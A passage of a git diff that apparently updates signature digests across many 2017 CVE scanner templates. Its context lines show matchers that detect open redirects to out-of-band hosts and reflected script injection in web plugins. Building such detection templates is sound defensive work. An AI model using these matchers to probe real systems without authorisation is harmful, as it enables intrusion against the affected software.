end of file diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index e0886d6d5c..8f2e87fe81 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' - -# digest: 4a0a00473045022100ae9fecd95f3b944c64dca35200bb0b2011547285514a4e9ccca83be341ae17fb02202790d207b943e969cbcb671a851c256328bc83644d621b3fad6b5d1e83d06345:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022018791177e3a62117038452b963088bf8d19824bc567a19e076085095c4a43a4002200377b4f51ebedaee75d21122b89403bd09eb515280664159b7b056bee9854980:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index ee0cfd3208..ab5cb3ad13 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ecb412d6648d675152488361048b0c9fe4d213322afe4eb5eb0f2c080d4ecedc022100f7e010784567394f5a5248baa5581af71bd70c5829235272b1c8f84c607799d5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210081a5d4756ddf1ff088c2d56a916f69bb39f19100a2b38f621b31ee7a5adbc43a022100e1e2ecb9437ab41bcf90b423063037a57561159d381ca52a4829a50334c9a0e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index b91f6282b4..4f304607f5 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022044b66b4d061259943e709c02e6f681181cd7ea69534a7eb8df68d60eecd3fe1f022100ff693788ba66f50537e0960474b86294890f801499784e56e39e8de7d6af50b4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b793ac600277dfa51f4931b99397cea243b6806fdda899a6eeeeb2d4753e079a0220761306d327c2db34ebd0cec007da0ae33b0a26cab93ee818653aedd79df4e035:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index 8e0525969c..4afaab6c50 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206eeba3a07c4e3991bf3822611e45eb74124f1d577bd08a469d6b3f82e1352308022100ae4a043b38594cc70535ccfe5e8bd9ad04064acb90edf6630a7ffaa19a323009:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207d71a049dfac3b5590c0d96867dd8f7113c0a39b829b5181db89dfc26b661d0c022034631e0500f0f2604e0b01be4a552fde7dbf9890dab5d58616e9c8319456e754:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index 3ccfc2b2e1..66e401afe3 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b66a1280094788d34ce47b2b6b795075f87c844d957152f83fa3b86d79dd4cb702202080e01571b4badcf970a2d06fe5979a0749ca5976cd834bf0315794ad1ab48f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202fb53f10cd72d8c43980a641c1c37cacad0517ee5ca5a88c449048a439d90a31022100f3bfe72d9e920352794c9e6d00418519333b0174b2b77b76eab15f7137b118f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11586.yaml b/http/cves/2017/CVE-2017-11586.yaml index 358aa4dad9..30826de247 100644 --- a/http/cves/2017/CVE-2017-11586.yaml +++ b/http/cves/2017/CVE-2017-11586.yaml @@ -44,5 +44,4 @@ http: part: header regex: - 'Refresh:(.*)url=http:\/\/interact\.sh' - -# digest: 4b0a00483046022100ab721ce6cf5880079664aadee5d88b797e2d49cf28d9a488bca1aa19ebfc01cf022100e46ae4f222677c3042c300e1713a45e7068182dcdbb16643ae0db143f41d0f36:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009c447b1249034a37d4c2a4ac213bd01220af10edb7d86dff582184454eccaf39022100a4b8b5c27b30d371eedbc5c1dc950f35df94a874a4d3f7e9794425a3b5ca78d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index 4b8bbe7d96..d2f9265193 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200ab513afb13bf8c19e1b876dc6727252992ce771490109dda292996e9a99aab7022009a95f0b55003d6dc8b496241ae902d656f305e4a53cd6ffd45e21e5278c327b:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022007463b54fa9d21362471d38557cf844292781ceae4b81edee96ea138114877d2022047cdabec1a407c446406dbf59df10cb26e994685df5348e63503a874bdca9ccc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index 3cda8a9205..11da2a20f9 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -43,5 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 490a0046304402202cfee10cbacb177f5ee7fee0e48b9ddbe9543d1f0c58b0dac6f34b9325700172022015fd64bf2c15b9a8d0a6a753844955dee65f58ecbc49e99db5280a614c3dc2b5:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206e70f9b5fe20632f52bac42cfc710a75c2500879211c5f8bb2f3073ac18815cb02201a1fc84553c21096011b57ba97497a4658b7dc726e901768b71e7f5ad65e3068:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index fa44cb4ea4..24c5dc7039 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204c92a5a44fe76f06807ffde4f90ec27f867034dc9dcc95a037ceaf2a3569c7e902200ba16126ff589c9cd762fefed42ac2cb24c0cb84a0619366ff49f30900a83e17:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203e60417d98eba0706dfeea4fdcb4dcba8067bd2fdbf821773b498229f3f61446022049ca80119355d428dd37deaa8f1eafd99ff0212c13e0345100a23148256a0fdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index 51a03185c0..1aac9af783 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -49,5 +49,4 @@ http: regex: - '"name"\:"(.*?)"' internal: true - -# digest: 4a0a004730450221008b1e86159e6ae72663dc9c4593d79db4526d6a6a6430efbbb2518a8aa367048f02207a369c79fd8cf9ce43a2178deb6021d755bae6a6effba83a84fca45c03e2a84f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100df9ac98f524e504cab5194b85047be0aa9ca30f17c0424fdfba6833b61acefee02201f01d19e5ff61c58426705676c7d568a9ed721143091bd411f9af42e3aa4e892:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index c0d6b23941..bf5254fd6e 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210092ff62655b4142d5e45643b160bb65eb1f41bae44669c1dafb0aa774d6965f7c02210089bb31ced7a9be94149c5e2be0f95ec08d9fa3084c1e7da49700da781719efba:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220745a30400b21edefc0701be3e235c8a1bc050cc3adb6be52a1e8335512a675ee02204b1dbdafd98df6389e7e96172c7c6b3a938dcb3c4eb6ec95fb729d7f25806176:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 4e91b92f24..a1674e16d0 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100de69e9c4bd4ca3b36ab892a6ccfc84f6e0f69dc6d0ab44cbe5bc96b68ab3af5002205c1cbe252d5087bd96130a509cf074b83bd082fc1c43e80e7b11e168382981b9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ac6e79fa1c1f82f4fe38659ba5e4659744a3208b73c0fc7de17765edb585a1a4022005e3541a73f733cd2dd96c9eb2632c211fa72f3274fc33ddd1588ec36338bc31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index 99103710cc..7b7d034cb4 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100bf0a843af5364fc87b91b02eba8c97422078880d5b7a2552b0ebf326450ff8d902202c7a1af65efc85e0afd74d878d369f06a497d101a7b514d24d44925421a03c06:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f9c3f68fc6507ccdf295468654bc875c135135d7899d46b67965b9a0f638003802210099d1df613e6ff7fbe43fc583c9b1b874d24e2a4b7fa517d912b0f8094423efef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index 591bf574a7..7e08917e9e 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -37,5 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' - -# digest: 4a0a00473045022100f1eac4d1bcdd65f8fe037bd599aa565038790a840aab9e9b281b3363c314568c0220527e96e369346432fbde6b6971a81fe78568c1a585f5795a00aa9961438e9a40:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207ae77018c883946257b0f2523c31c242683263359b3402b65ec6553aee8fca74022100b0900818decc1fd3e5941706870acfca3b193d22c3cb01a9f28ebb8ebcaef589:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index 84c7412b50..01ba1ee569 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210082e5cdac05490fa0c2b06cb1616ead3f935668dd3f56201cb7047be2630f9a3f0220049e2ff1ed26ffce816175b49cee669a5b0fa6560b3f47f7dbb76e5ea2cb7cf3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205359f9583d16b34d78e34451d48ffb56649f4c8e5e574cdeea63bccb053e982e022100da47299839facb3f536c458076a4452f60d005c07904708671ffe84c4d8605b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml index 376d4cebbf..ce24459bdc 100644 --- a/http/cves/2017/CVE-2017-14537.yaml +++ b/http/cves/2017/CVE-2017-14537.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502204b4cfd07b0495356b7787081998614c387cda7e15a2b0b4af9f200d2bdd8266e022100f6b467b38a36bea94eb2b292611d6137273af70234d784e5598b84ef53f2ba24:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a0f73abf83ba763eb7f3fc3c0bc313689fd401ea4cbd9ed66b7926922dac0f4a02200d68647f47ce8b006faa75dc2917b8b1bac897f93ec130809d5e7e86ae551dc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index 4fb10380c1..187552c19b 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -51,5 +51,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "2kb-amazon-affiliates-store")' condition: and - -# digest: 490a004630440220479f3cfbc0a22c53a06df0d18cd7fafec1c7c80edfd4d299df00f4add03caef902206912675b2ed9faf73137a2e8822cdc5a3bb0ae4ebe936a946de0b0f635a2f7c2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100da1169d75a81c83a353a0058bbefb60602dbd884bcffdecede697896bb98b3560220194114a2e4adadeda650f1559d79779f8148917782612064b0a1cd2982de4cae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index f5031b92b8..8d923ed67a 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -44,5 +44,4 @@ http: part: header words: - "text/html" - -# digest: 4a0a00473045022100b6c0bedba7cb9655ae9716982c27d04e98c156da2b16b9e83f20bba325c4f9a402201b78cc31ad8044b0527ca18933c309fba2473a1fc27976540bd6befe6ea494b9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cfc8f52c151ae24153b9afb1e680444dae41899ae32aface8dc91ab0e2feed7a022028582104250a7cebff61091603cd10f50845580a1f2351ccd93a54587aef2a6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 330782e092..7c248a1035 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -38,5 +38,4 @@ http: - type: word words: - 'Unknown command: ' - -# digest: 4b0a00483046022100a9e3236953c0572e3b76ba44cf0f404c2ebdd7f37aacdf0d506b7427f028d7ac022100fc2f68ee5730f0e20825bb6fb71faaa9d5dde1af9ad2748e1f7855d561a3a74d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e6e886b5723db02563a1b4e6da682deb97453e689b6ec659bf56004caa51a46a02210099e28c9b970b955a640e8b707adf95aa0a2895c8362bcba5e4645523023fd9fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index ab8fefd546..e099ff5b2d 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200fafbbed53e329aef0dfb1228865400ac07c1949a0c2b5738ab861f492e85c7a022010e1167dc43481dbb68a38080702dafc59539b388a9f1f69fa8c06d15598c20c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a5ae885c764293ca5592d8fda50cc2778d05b4347d6409aba63b1eca6875cff202207217e616dbf1881b918b0250c3f4abeaea56ea79d9b376bfb668489572e1a1e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index 400bb87c1e..c69cf58fe1 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206666da323bb264fe9cd883ea934d11bcfc1da9dc9cc9c86b72c576813b9e5660022100acef2731260bb6df592fd39f1b315b28af56b40a9803d00163a5c9a6ac76ca73:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022042dd45054604e99c7355104cebf6896f8b0e105d3c2a14aa1c2fb2723fa726b1022030d2be2810e5932b00b326000434bca4f425f7a83d2148254de54fb9bea8e502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index a25ae8df7a..2f4a0f91e9 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220554b02d111ebad1022c9a6bb13e3e44f9cc6c44219fc53911c16a9d824d516ee022100a73a93cf7e5028a448b7f89e12e91fc2db986d2fbc72d179e2a0e2931e1955ce:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201e9e8f13b61840484cfca6b6528e760b05a2dd8f5ffb50166ad8d34a3d19f87802201d7ef1e67e378caaf96c072533be2b85c4a509c3fd4382eef85f6d89a4f3ea28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 37abb58ec1..6067d6728f 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a9a4ceefbb9ffbea306ca147a8f8783384d199485f7cc75549085e6f1de3be3e02206ab08f2fe324846209b40af0fde66cd54c910fb1a196c87ac016de402a0609fd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100957e60e565e9de4be86c0778840c4115c622fdd6efb436a5765291066715d7cc02203c54fbb2dd709627bb67a341e3f2b52b46bee4142e1947827708e2e3a45b859a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 219ffdcfb0..d350e9fa2d 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200513311e4544c269cfac986f325bd4bd7352005df48d984fcf76ddb4bbaa9823022044b014d61eb72331bd1a6617053e014d932432f4bc1e0d7b48ef99233a71e7fd:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200f1c0b74bb7e668e7f00e806ae3dd152a41149724e9f8ac6f1fb17a513bd329602206e00b3651afcac7b7a84e316a744976a10020eba1e03875d2741a66ba26bfc2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 4c11c2943b..b481028e7f 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009331e6167bdd740c142bfbf4c7ba19be8620e712bc36d8e7aa31b310af72a9da022100df92e355646d9fa594454cc92b9fcbfc2f5fc319ce45b1225d1b3d2105e4d0e7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210096190fd0dfb468938bbae908dcfa76eb12758c2a03945c153dd96f7f7d0b14e70220443b287ceeb5561ae147c9dd7e19a3994ae6ff69d8b2bf3372294a03172482b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 004b48358e..d35b96a29d 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202022eb225eff565e4a69e924a5712fd9161871a96d3a2a756cecc4ddcf160d0a02205c82aa188ed977877ce4118c9bb55b17c34701b5c12152d73940ca22f9c603f6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e81f3510d3f560ff93f848020a4f908e7346bbdd232b3b41f4f196ecc525b3b90220784588d5532c750975b769f082976414862c8afdc80b5c13cf3cf5d84f539fe1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index 7fcc8a06f2..0f82a349ad 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009f90897774dc84345e4d4c11ee1cccd20a586c66aee5e70f67b43655bffed54802203431068231b29e510b85e0a922304f3ce7b1bb22c2b8486d19be146e8d9ecb7a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100afffae80a55bb4b776e2a585fdb33223d055659eb9aa805e2a1f4ab996edb328022100977173a32d5d7fe0320980171ec8894dbfdb17f2e8c1f9f520f53ba0500f0817:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index b7c515820e..20973ce859 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -47,5 +47,4 @@ http: - "Database Setup" - "SQLServer" condition: and - -# digest: 4a0a00473045022014c89a56f441ce35df018658a0f056c55e348947e8a488c7e449560dc5a18611022100ed98f6918d0b61d24b68ac8560311008140964a370bab4530e6e5acba081e401:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b5993d1fd6e542d813aa9392cefe073a893daeed78fb5a7cdfdd06684ae60505022013cdc5c61a3d72fc590caa4bc5995bc46704844b409cd46bdffefa5367a51dd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index 37291c8c25..77324a24f7 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ada58478340c1611b34ef57dc31590b8da9057b609604e9c3031767fbca379fe02203f9e4b1006ad4eb29ed444eb21d004caaf22d83ae262bc6ca0cd08c602a0a3db:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203c216628f42c70ef158bcc67dbdaf4ae32fa155853fc940a0e376768740e058802207ea08f41cf5b06b079b4e2961261ff042fea0b6829f1bdadd082ad3c86d6a177:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index 61550678da..2f652d3579 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Google AdSense")' condition: and - -# digest: 4b0a00483046022100d04a309ea856ccbd75ad0a269c6fea7fb0470b7ac771f922d70cf43c5ed28f510221008a9cc51f21971147e642a2ffbd9f94143c40d99c872c9b1495ec3218c0744cbf:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cdd4c0a3ddc9beae4940e055418122c73a73eacafd5ec71564cebaa0d0ffaf1502200a9429a1f95fe862e2d094b223d3d9c3ded263b258f9da40909822c6e72ab9e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index 5ac076ffa0..9d61a8eed6 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form Multi by")' condition: and - -# digest: 4a0a0047304502206dbc2331b56a6eb78b1163b201a5d433cd41f1dcbd2633b880e4b16af250e372022100f1009ade6a2ef1dbfeeb514afb5e910284d23b3f76328e9a5d2fe7e0e3a018f8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200ea20e6baac3cb9091e58a1ecf0569b2c9278326d542d29f52f521d2f76769980221009e9f9ea5adde4a5f5c9ef64d892981bd9da02d4cc953d819b967a76392171118:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index c4482f334e..dea82113d0 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form to DB by")' condition: and - -# digest: 490a0046304402207d719bbcc59a42607c6b69240271e82562630f93654be5e3ade8d79f6dc633fd02200d2c19ac3d51ad930828a796118402f9e23abb8a218f75951e16b4a3903f3221:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b3c722e3f85d26992eed7b9878451f59c3d26fd3849f375c547d23018a92deaf0220541dde9df3076fc1da9a2a691cb30926a650b62c2afa5dcc0333712d13de8a0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index bfe0ff6305..20f14e776d 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Custom Admin Page by")' condition: and - -# digest: 4a0a00473045022100b7663651a7b05c31925c9cd3695f09dd61f4d6f9e0b28deecc8a2743654a078f02203613b672dbeefc4f9237311f540513c0c9b83447e74034f30cd6a0086405310a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203906543f18f28e3dd7cc6335724d29a007ace5f846296443a9c9f76280fdd8cb022100a92c69fbd8a658b116443e76bd20a48872530fac2498222fa08b4376fc4d5dec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index 8052c78ad6..b1326500dd 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Custom Search by")' condition: and - -# digest: 4b0a004830460221008e7dcfb2d22b21f1b6ec7bfe100a7101eea1156b7186fb3b163d66392ad1b699022100af5938bc05e13ff903537305096f05b724df782e03808e0701a597727a2adc5d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a157cabcc2b1a6e7eb8771190cebaf49e3f02bc797129db82a8a4c1f2341d8f3022100be12ef87fa9d0353c0cc40c12fe9158c411b179d8c6e1ed46af89b7298278f4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml index 5b0fdf03b6..4583ae1549 100644 --- a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Htaccess by")' condition: and - -# digest: 490a0046304402207e86ea49d7ae56939eb6ece6e0197890ddee733fd25d283f160708a1ad910a7c022000aa962622cdaae1a19ef31fff8d701d2edaa17e3182ce0d804eab4c59285b39:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022069f7d45e9acfe587159ab4e07302f60a34b586c8bba19eee4312d4ef186489b2022100962a1ec247c3776aa80712d5e624ff5947fed48c666a1e7de55decb2784f99f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index eb5d25bfb7..fa667aa233 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Social Buttons Pack by")' condition: and - -# digest: 4a0a00473045022100fc3d75bb7a5b133b8dfca30adf5efa4c6a7a34af80b5cd977776515efdf1700902202e9f2452b784fc2f1ad4f03584bc86c8ac7676d5625e8b13672233f3440e9aab:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100dd3311e4213358b25a206e5750040c0684d09dfddafc3f2b8715799613065b5a022062c408e8ba6e14c7e36fded1bb1f16e8fa47b97fd2b107a189afd775e7127610:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index bcaac96305..265d3f6e7a 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 